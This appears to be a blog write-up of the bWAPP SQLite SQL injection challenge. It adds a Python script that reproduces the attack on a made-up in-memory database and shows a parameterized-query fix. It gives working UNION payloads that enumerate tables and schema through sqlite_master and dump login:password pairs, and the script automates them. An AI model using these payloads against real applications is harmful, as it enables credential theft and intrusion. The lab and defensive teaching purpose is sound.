Hi again. Today I have decided to document yet another unpublished challenge presented in bWAPP. This challenge concerns SQL injection where the back end uses the SQLite engine.
I will try to make this post relatively short, explaining the following:
- Getting To Know Our Target
- Finding Database Information (tables/columns/sqlite version)
- Extracting Database Information
- Last Words
Getting To Know Our Target
In this section I want to cover finding the SQL injection vulnerability and the preparation needed to arrive at a working injection.
This challenge has a very similar layout to the previous bWAPP challenge I posted: it allows users to search for movie titles. The vulnerability itself is not difficult to find. Placing an apostrophe in the search string induces an error:
The page reveals a vague "Error: HY000" message. HY000 is the catch-all SQLSTATE "general error" code, so it says nothing about what actually went wrong. I spent a few moments searching on Google for relevant results, but the information I was coming across was not very useful. I am fairly confident in exploiting SQLi vulnerabilities, so I approached this challenge as I normally would.
The first step was to find out how many columns the table used by the query has. The problem with this error message is that it is not informative in any way: any syntax error or any incorrect value I sent produced the same error. Because ORDER BY with a column number beyond the column count is itself an error, it is still usable as an oracle:
iron' order by 300--   <-- Error: HY000
iron' order by 1--   <-- No error
This confirmed I was on the right track. A few attempts later (ORDER BY 6 is accepted, ORDER BY 7 errors) I had established that there were 6 columns.
That was all the preparation needed before digging further into the database, which brings us to the next topic.
Finding Database Information (tables/columns/sqlite version)
Before I started to inject this web page, I knew what kind of information I was looking for. The issue was that I was not familiar with SQLite syntax. After looking at some SQLite documentation, I gathered enough to know how to concatenate strings, find the SQLite version, and obtain the tables and columns.
The following injections demonstrate those concepts, thus completing the challenge. In the payloads below the `+` characters are URL-encoded spaces, and `--+-` (i.e. `-- -`) comments out the remainder of the application's original query.
Finding SQLite version:
Finding database tables:
'union+select+1,2,name,4,5,6 from sqlite_master--+-
sqlite_master is SQLite's schema catalogue; its name column lists every table, index, view and trigger in the database. The injected value is placed in the third column because that is the one the page renders, and the other five are padded with integers so the UNION has the same six columns as the original query.
This next injection retrieves the DDL statements used when creating the tables, which sqlite_master stores in its sql column. This effectively reveals the tables and their columns in one request. The injection follows:
'union+select+1,2,sql,4,5,6 from sqlite_master--+-
The returned CREATE TABLE statements give the information needed: the users table has login and password columns.
Extracting the login and password from the users table:
'union+select+1,2,login||":"||password,4,5,6 from users--+-
SQLite uses "||" as the string concatenation operator; here we join the login and password with a colon so both land in the single displayed column. As with the earlier payloads, the leading apostrophe closes the application's string literal first. One caveat: ":" in double quotes is only accepted because of SQLite's legacy fallback that treats an unresolvable double-quoted identifier as a string literal; builds compiled with SQLITE_DQS=0 reject it, so ':' in single quotes is the portable choice.
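The whole procedure from this post, counting columns with ORDER BY, listing tables and their DDL from sqlite_master, and concatenating login and password with ||, run end to end against a constructed in-memory SQLite database. This is an added example and not code from the original post or from bWAPP: the table layout, the rows, the fake password hashes and all function names are assumptions. Two things go beyond the post: the column count is found by binary search rather than by stepping, which generalizes the ORDER BY oracle, and the version step (whose payload the post does not show) uses SQLite's documented sqlite_version() function. search_safe shows the parameterized query that defeats every one of these payloads.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the bWAPP movie search backend.
    Only two facts from the post are reproduced: the searched table has six
    columns and there is a users table with login and password columns.
    Everything else (names, rows, the fake hashes) is made up for the demo."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER,
                             genre TEXT, main_character TEXT, imdb TEXT);
        INSERT INTO movies VALUES (1, 'Iron Man', 2008, 'action', 'Tony Stark', 'tt0000001');
        INSERT INTO movies VALUES (2, 'The Incredible Hulk', 2008, 'action', 'Bruce Banner', 'tt0000002');
        CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'constructed-hash-1');
        INSERT INTO users VALUES (2, 'bob', 'constructed-hash-2');
    """)
    return con


def search_vulnerable(con, term):
    """Deliberately vulnerable search: the term is spliced into the SQL text,
    which is the mistake the bWAPP challenge is built around."""
    sql = "SELECT * FROM movies WHERE title LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_safe(con, term):
    """Hardened search: the term is bound as a parameter, so it can never
    change the structure of the statement."""
    sql = "SELECT * FROM movies WHERE title LIKE ?"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


def order_by_works(con, n):
    """True when 'ORDER BY n' is accepted, i.e. when n <= the column count.
    The real app only shows 'Error: HY000', so any exception is the signal."""
    try:
        search_vulnerable(con, "iron' order by %d--" % n)
        return True
    except sqlite3.DatabaseError:
        return False


def count_columns(con, upper=300):
    """Find the column count by binary search between ORDER BY 1 (known to
    work) and ORDER BY `upper` (known to fail), instead of stepping by one."""
    lo, hi = 1, upper
    if not order_by_works(con, lo) or order_by_works(con, hi):
        raise ValueError("ORDER BY probe does not behave as expected")
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if order_by_works(con, mid):
            lo = mid
        else:
            hi = mid
    return lo


def union_extract(con, expr, source=None):
    """Run the post's UNION payload with `expr` in the third column and
    integer markers in the others; return just the injected values."""
    payload = "' union select 1,2," + expr + ",4,5,6"
    if source:
        payload += " from " + source
    payload += "--"  # comments out the trailing %' of the original query
    rows = search_vulnerable(con, payload)
    # LIKE '%' also returns the genuine movie rows; the markers identify ours.
    return [r[2] for r in rows if r[0] == 1 and r[3] == 4]


def sqlite_version(con):
    # The post omits this payload; sqlite_version() is SQLite's documented function.
    return union_extract(con, "sqlite_version()")[0]


def list_tables(con):
    return union_extract(con, "name", "sqlite_master")


def dump_schema(con):
    return union_extract(con, "sql", "sqlite_master")


def dump_credentials(con):
    # Single-quoted ':' rather than the post's ":" so it also works on
    # SQLite builds compiled with SQLITE_DQS=0.
    return union_extract(con, "login||':'||password", "users")


if __name__ == "__main__":
    db = build_db()
    print("columns:", count_columns(db))
    print("version:", sqlite_version(db))
    print("tables:", list_tables(db))
    for ddl in dump_schema(db):
        print("ddl:", ddl)
    print("creds:", dump_credentials(db))
    print("hardened search with payload:",
          search_safe(db, "' union select 1,2,name,4,5,6 from sqlite_master--"))
```

The marker filter in union_extract matters because the original query's LIKE '%' still matches every real movie row; the integer markers in columns 1 and 4 separate the injected rows from them. Against search_safe the same payloads are just literal search strings: ORDER BY 300 raises nothing and the UNION returns no rows, because the term never reaches the SQL parser.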
This concludes this thread. As always, I really hope that you can take something from this reading. Although SQLite is less common than the big client/server RDBMSs as a web application back end, the same information disclosure is achievable through SQL injection, and the fix is the same too: bind user input as query parameters instead of splicing it into the SQL text.